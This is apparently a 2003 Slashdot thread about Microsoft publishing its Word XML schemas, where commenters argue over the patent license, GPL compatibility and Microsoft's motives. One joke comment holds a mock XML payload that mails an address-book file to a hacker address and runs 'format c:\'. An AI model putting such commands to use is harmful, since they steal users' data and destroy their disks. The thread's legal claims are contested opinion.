Microsoft Word Document ML Schemas Published
Lars Munch writes "On Monday the 17th November the xml schemas for the Word Document ML along with documentation, was uploaded to the Infostructurebase (ISB). With the Word Document ML specification anybody can generate, view and process Microsoft word documents on any format." (Here are the legal terms under which the schemas can be used.) "The Word Document ML is based on the W3C specification eXtensible Markup Language (XML), there by providing documents that are easy to integrate into a large variety of systems. The Danish Government Infostructurebase is the first schema repository to make the schemas accessible to the public. The Microsoft Office Document ML schemas and documentation can now be downloaded from the ISB Repository." There are more links on this page.
I was struck by Microsoft's about-face on proprietary data formats when I attended their "Microsoft Office System Launch" (details here) earlier this month.
On the "Development" track, I was hoping to get some information on interfacing Office tools as objects in an existing (very large) VB application. Well, I didn't get that, but I did get to see how Microsoft is using XML to cut off one of Open Source software's big draws: open file formats. As mentioned, one of the big selling points was that you no longer have to install an app like Word on your server. You can instead use any XML-generating program to create fully compliant Word/Excel/Whatever files.
So if the PHB was almost talked into Open Source by the security issues of installing a virus portal like Word on a trusted system behind the firewall, Microsoft just cut your legs off.
An interesting case of "If you can't beat 'em, join 'em, *then* beat 'em."
By the way, I bailed out of the "Development" track at lunch. The presentation didn't get into code at all... it was just a demo of how new features in Word will now allow anyone to create XML Schemas and "Solutions" (groups of schemae), and thereby call themselves a "programmer". Just what we need, another way to quickly generate bloated, write-only code.
Stressed? Me? Of course not. Stress is what a rubber band feels before it breaks, silly.
Defeated by my own cleverness and the lameness filter. Now I need to type at random in order to dodge the bullet. Neat-o. Nope, not enough yet. This is better than resorting to cut and pasting of the usual "Important stuff" list, don't you. Although it is rather early for this. DAMN IT still too many caps, although I guess that didn't help, now did it. I guess I could look at the code and see what the percentage is before it dies, but that's way harder than just typing until my fingers bleed.
This is a real problem. However I think it may perhaps be circumvented by having a MSOfficeOpenOffice converter under a BSD-like license. The combination of the BSD'd plugin and eg. OpenOffice might however infringe patents if they were too closely integrated. Murky legal waters. Ugh :-(
Any sufficiently advanced libertarian utopia is indistinguishable from government.
It's NOT reasonable. They don't allow any modifications or derivatives of the schema without permission.
So, Microsoft will be free to continue changing their format with each new release, breaking all the open source programs for a time, causing time and trouble for users to upgrade.
We don't like Word formats because they change frequently, and they are developed in a direction that suits Microsoft. How does this change anything?
This is America, damnit. Speak Spanish!
Now try the link
The name and trademarks of Microsoft may NOT be used in any manner, including advertising or publicity pertaining to the Specification or its contents without specific, written prior permission. Title to copyright in the Specification will at all times remain with Microsoft.
So you can write an app which transforms a Word doc to something else, but you can't refer to your app as a Microsoft Word file converter. So how long until we'll have a "Converter for the Evil Empire's word processor document type" project on Sourceforge?
I want to delete my account but Slashdot doesn't allow it.
Microsoft is allowing you to license the patent free of charge but not to sublicense it. The GPL requires that you be allowed to sublicense patents applicable to GPLed software. And that's somehow Microsoft's fault?
I'm assuming it's actually fairly innocent but just how wide a scope does it have under the word 'relating' ?
Finally, what are the legal constraints on M$ changing or withdrawing this licence at a later date? Presumably they are no more limiting than those on the GPL, but then I've never worried about Linus or RMS withdrawing rights from Linux, wheras with M$...
ITIAL's (I Think I'm A Lawyer) out there who can explain?
Aide-toi, le Ciel t'aidera - Jeanne D'Arc.
> Wait a second ... I think the XML-format document types are only available for corporate versions of MS office. If that is true there still will be a lot of propiertary binary-only .DOCuments around in the future.
You are wrong. Word Standard Edition can save into WordML (which schema has been published). Enterprise version allows you to map certain parts of documents into Xml with customer specified schema.
Not true. Section 7 of the GPL requires that patent rights be publicly available, but it does not require that you personally sublicense those patent rights.
Specifically, GPL section 7 says:
Since the Microsoft patent license does permit royalty-free redistribution, it does not contradict the GPL in this regard (although it may have other incompatibilities; I have not looked at the whole thing thoroughly yet).Comment removed based on user account deletion
I'll take this over having to reverse-engineer the specs and deal with potential IP issues. For once, Microsoft did us a favor, even if it does come with strings attatched.
Finding God in a Dog
<cmdlist>
<command>
<mailto>h4x0r@wegotsworms.com </mailto >
<file>C:\\Documents~1\my_address_book.pdb</file&g
</command >
<command type="system" action="format c:\"/>
</cmdlist>
oops. parse error. but a clean HD!
> They don't allow any modifications or
> derivatives of the schema without permission
Hm. I guess I'm not sure what would be gained by doing that - i.e., changing the spec and republishing it. Why would that be a good thing to do, even if you could?
> Microsoft will be free to continue
> changing their format with each new
> release, breaking all the open source
> programs for a time
Right... but couldn't the same be said of any API? I mean, if the Apache plugin API changes, I'll need to rewrite my mod_foo module to use the new API.
The Army reading list
I already have the ability to save my word processing documents as XML. I already have the ability to transform them into other things I want. So do you. check it out.
I'm sure someone, someplace is already working on the appropriate xslt to transform Microsoft's stuff into this more open format, and I'm sure Microsoft has some ace up their sleeve technically or legally to push it into a 'gray' area...
But I just cannot imagine anyone having the gaul to say that my data is only available to me in a format that they control the terms and conditions on. how successful would a paper company be if they put 'terms and conditions' on the use of their wood pulp?
Why bother with proprietary file formats when you have DRM? Make a mendacious nod to 'open file format', and then lock stuff up behind the DMCA. If you want to read a DRM encoded word document, you'll need word. Period.
--Lawrence Lessig for Congress!
Previously we could reverse engineer their format and use it. Their work was covered by copyright, no problem once we create our own implementation.
This schema is patented. Patents are an exclusive right to use an idea. Now if you use their format without upholding their conditions, you're a criminal, even if you figured out the format yourself.
By publishing the format, they can cast doubt on anyone that does reverse engineer it. "I bet you read the spec on line".
Also, being able to view the format isn't much use. It's XML, but that doesn't mean it will be meaningful cleartext. They can simply uuencode a big block of binary data, stick it between two tags, and it's valid XML.
Learn from the past. Microsoft are not here to do us favours.
Expert in software patents or patent law? Contribute to the ESP wiki!
I think you are making 2 mistakes here:
(1) You say: Open Source != GNU Public License..
There's no such thing as the "GNU Public License"; you probably mean the GNU General Public License.
(2) Microsoft's license says: "You are not licensed to sublicense or transfer your rights". This means if you write a program using Microsoft's license, and license your preogram under the BSDL, then someone using your program isn't licensed to modify it. I would imagine MS have done this deliberately to sabotage open source / free software implementations of their XML schemas.
Microsoft knows full well that an XML schema cannot be patented. The patent nonsense is a way to scare off open source developers. They may hold patents on some algorithms they've used to implement this in MS Office, but we don't have to use those same algorithms to read those documents with an XML schema capable parser and do whatever we like with them.
Don't forget that in the EU patents can not be abused in this, since the nice people from FFII and others got through an amendment that you are free to use patented technologies for interoperability - and I can't really imagine any other uses for a fileformat besides of interoperability.
Real life is overrated.
>Hm. I guess I'm not sure what would be gained by doing that - i.e., changing the spec and republishing it. Why would that be a good thing to do, even if you could?
1) All specifications are incomplete. The requirements that it addresses today are not static, and in 10 years there will be new requirements.
2) Microsoft will change their XML schema.
3) Historically, Microsoft has done things that are in the interest of Microsoft. Everyone else must follow along.
4) Therefore, the changes that Microsoft will make the the XML schema have a high liklihood of being advantageous to Microsoft.
When Microsoft keeps all the real control of the format, it turns any open source developer into a sharecropper. We're going to be plowing a field that we don't own, and the price we pay is going to entrench the Microsoft format even further.
This is America, damnit. Speak Spanish!
Apart from the legal loopholes in Microsoft's license that are big enough to drive a truck through, much more worrisome is the fact that Microsoft asserts that they are getting a patent on an XML Schema. What is the novelty in that schema? It's a standard XML representation of well-known word processing data structures and concepts.
.NET APIs is a similar trial balloon.
This would be a very bad precedent. Microsoft is really trying to push the limits of patentability and testing what they can get away with. Their patent application on
That is something open source and free software developers should really worry about.
First, remember that file formats in general are patentable. The ASF video format is one example.
Some might say: "But that's a binary format."
Doesn't matter. Microsofts Office-xml format has plenty of binary data. They uuencode it so that it's official XML, but it's still encrypted or command content, not cleartext.
What if Microsoft embedded an ASF video in the word format?
They'd have to uuencode it first, then stick it in. Would this suddenly make the ASF format non-patented? no. And once parts of a format are patented, you can't recreate the whole format without negotiating a patent deal with the holder.
Yes, the law is an ass. No, you can't circumvent it with clever words.
Expert in software patents or patent law? Contribute to the ESP wiki!
(Forwarded from Patents list)
t en tlicense.asp
-------- Original Message --------
Subject: [Patents] MS Office 2003 XML patented
Date: Mon, 17 Nov 2003 13:48:11 +0100
From: Carsten Svaneborg
Organization: www.mpipks-dresden.mpg.de
To: patents@aful.org
Hi! Just came across the following:
http://www.microsoft.com/mscorp/ip/format/xmlpa
Office 2003 XML Reference Schema Patent License
Microsoft may have patents and/or patent applications that are necessary for
you to license in order to make, sell, or distribute software programs that
read or write files that comply with the Microsoft specifications for the
Office Schemas.
So usage of MS Word XML files requires a patentlicense.
:
You are not licensed to distribute a Licensed Implementation under license
terms and conditions that prohibit the terms and conditions of this
license. You are not licensed to sublicense or transfer your rights.
The licence is royalty free, but GPL 7 requires the right to sublicence
patent rights to the people who obtain a GPL program from you.
so in other words Microsoft is using patents to prevent GPLed programs from
accessing the XML format that MS Word will be using.
This is very good timing, and goes to show how important it is to ensure
that the software patent directive has articles that protects
interoperativity from consituting patentinfringemet.
--
Mvh. Carsten Svaneborg
http://www.softwarepatenter.dk
There's a couple issues here:
1) The clause forbidding you from modifying and making derivatives of the specification. Well, certainly, the specification is copyrightable and MS is within their rights to make this demand. Any reverse-engineered description of the file format would not be covered by this clause
2) The part claiming various restrictions on implementing the specifications. This one's just plain strange. MS doesn't say they've patented the format. Nor do they say that they haven't. They simply suggest that they _might_ have. And if you want to be covered if they have, you've got to accept their terms. Which include not mentioning their name, no sublicensing, including the clause, etc.
IF they have a valid patent, they can enforce this. They can enforce it even if you never looked at the specification. Even if the format was reverse-engineered by a couple of guys from Elbonia who'd never heard of Microsoft until you showed them the files. Wouldn't matter -- if you wanted to read&write Word files, it'd be their way, or the highway.
If, on the other hand, they don't have a valid patent, you can read their specification and implement away. As long as you don't incorporate the spec into your work, copyright can't prevent you from writing an implementation. You can claim compatibility with Microsoft Word or Office (under trademark fair use). You don't have to include any verbiage of theirs. You can print out their license with nontoxic inks on soft paper and use it as it is best intended.
So which is it? Well, Microsoft isn't referring to any particular patent number, so I suspect their license is 95% FUD. The other 5% is that they probably have an application in with the USPTO which covers some either obvious, overbroad, or non-novel things in the Word file format, which will probably be approved because the USPTO approves everything. IMO, and I'm not a lawyer, there's certainly no advantage in accepting the license until Microsoft at least provides a patent number demonstrating that you're actually _getting something_ for accepting their restrictions.